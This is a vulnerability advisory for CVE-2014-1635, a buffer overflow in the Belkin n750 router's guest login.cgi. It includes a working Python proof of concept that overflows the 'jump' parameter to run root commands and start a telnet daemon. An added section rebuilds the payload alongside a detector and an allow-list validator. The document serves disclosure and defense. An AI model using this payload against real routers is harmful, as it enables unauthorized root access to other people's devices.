1. Vulnerability Properties
Title: Belkin n750 buffer overflow
CVE ID: CVE-2014-1635
CVSSv2 Base Score: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Vendor: BELKIN (http://www.belkin.com/)
Products: n750/F9K1103
Advisory Release Date: 2014-11-04
Advisory URL: https://labs.integrity.pt/advisories/CVE-2014-1635/
Credits: Discovery and PoC by Marco Vaz <mv[at]integrity.pt>
2. Vulnerability Summary
A remote, unauthenticated attacker can execute arbitrary commands as root by sending a crafted POST request to the httpd instance that handles authentication for the guest network (login.cgi on port 8080 in the PoC below). No credentials or prior session are required.
3. Technical Details
The vulnerability can be confirmed by sending a crafted POST request in which the "jump" parameter consists of 1379 bytes of padding followed by the commands to be executed, delimited with ';'. The padding must not contain zero bytes: it overflows the buffer that holds the parameter and overwrites an adjacent internal control variable with a non-zero value, after which the attacker-supplied commands are run as root.
The following POC code can be used to verify the vulnerability:
#!/usr/bin/python
# Title : Belkin n750 buffer overflow in jump login parameter
# Date : 28 Jan 2014
# Author : Discovered and developed by Marco Vaz <mv@integrity.pt>
# Tested on: Firmware: 1.10.16m (2012/9/14 6:6:56) / Hardware : F9K1103 v1 (01C)
# Python 2 (httplib); on Python 3 use http.client instead.
import httplib

headers = {}
# 1379 bytes of padding reach the control variable; "%3b" is a URL-encoded ';'
# that delimits the injected command (here: spawn a telnet daemon on the device).
body = "GO=&jump=" + "a" * 1379 + "%3b" + "/usr/sbin/utelnetd -d" + "%3b&pws=\n\n"
conn = httplib.HTTPConnection("192.168.169.1", 8080)  # guest-network httpd
conn.request("POST", "/login.cgi", body, headers)
response = conn.getresponse()
data = response.read()
print data
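The following is an added example, not part of the INTEGRITY advisory or Marco Vaz's PoC. It rebuilds the request shape described in section 3 in Python 3 and adds the two checks a practitioner would want alongside it: a detector that flags a POST to login.cgi whose "jump" value is overlong or carries shell metacharacters, and an allow-list validator of the kind the server side should apply before copying the value anywhere. The 256-byte ceiling, the assumption that "jump" is a post-login redirect path, and the sample traffic are all constructed for the example; the advisory itself only states the 1379-byte padding and the ';'-delimited command.

```python
"""
Added example (not part of the INTEGRITY advisory or its PoC).

Reconstructs the crafted POST from section 3 and shows a detector for it
plus an allow-list validator for the "jump" parameter.  Assumptions
(not from the advisory): JUMP_MAX_LEN, SAFE_JUMP and the SAMPLES list.
"""
import re
from urllib.parse import parse_qs

LOGIN_PATH = "/login.cgi"
PADDING_LEN = 1379   # bytes of padding before the control variable (advisory)
JUMP_MAX_LEN = 256   # assumed sane upper bound for a legitimate redirect target
SHELL_META = re.compile(r"[;|&`$]")
# Assumed: "jump" is a post-login path on the device, so only that shape is allowed.
SAFE_JUMP = re.compile(r"^/[A-Za-z0-9_./-]{0,255}$")


def build_exploit_body(command: str, padding_len: int = PADDING_LEN) -> str:
    """Byte-for-byte the PoC body: GO=&jump=<padding>%3b<command>%3b&pws=\\n\\n."""
    return "GO=&jump=" + "a" * padding_len + "%3b" + command + "%3b&pws=\n\n"


def analyze_login_post(path: str, body: str) -> list:
    """Return (finding, detail) tuples for one POST; an empty list means benign."""
    if path != LOGIN_PATH:
        return []
    # parse_qs percent-decodes, so "%3b" becomes ';' before the checks run.
    params = parse_qs(body.rstrip("\r\n"), keep_blank_values=True)
    findings = []
    for value in params.get("jump", []):
        if len(value) > JUMP_MAX_LEN:
            findings.append(("jump_overlong", len(value)))
        if SHELL_META.search(value):
            findings.append(("jump_shell_metachar", value[-40:]))
    return findings


def is_safe_jump(value: str) -> bool:
    """Server-side allow-list: accept only a short, path-like redirect target."""
    return SAFE_JUMP.match(value) is not None


# Constructed sample traffic: a legitimate login, the PoC request, and an
# overlong value on an unrelated endpoint (out of scope for this rule).
SAMPLES = [
    ("/login.cgi", "GO=&jump=/index.html&pws=correct-horse"),
    ("/login.cgi", build_exploit_body("/usr/sbin/utelnetd -d")),
    ("/status.cgi", "jump=" + "a" * 2000),
]


def scan(samples=SAMPLES) -> dict:
    """Map sample index -> findings, keeping only the samples that triggered."""
    hits = {}
    for idx, (path, body) in enumerate(samples):
        findings = analyze_login_post(path, body)
        if findings:
            hits[idx] = findings
    return hits


if __name__ == "__main__":
    for idx, findings in scan().items():
        print(idx, findings)
```

The allow-list check only helps if it runs before the value is copied into the fixed-size buffer; the actual fix for the overflow is bounding that copy, and the fix for the command execution is never handing the parameter to a shell.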
4. Vulnerable Versions
Confirmed on Belkin n750 F9K1103_WW_1.10.16m.
5. Solution
Upgrade to Belkin n750 F9K1103_WW_1.10.17m.
6. Vulnerability Timeline
24 Jan 2014 – Reported to Vendor
28 Jan 2014 – Sent POC code
31 Mar 2014 – Vendor released new firmware version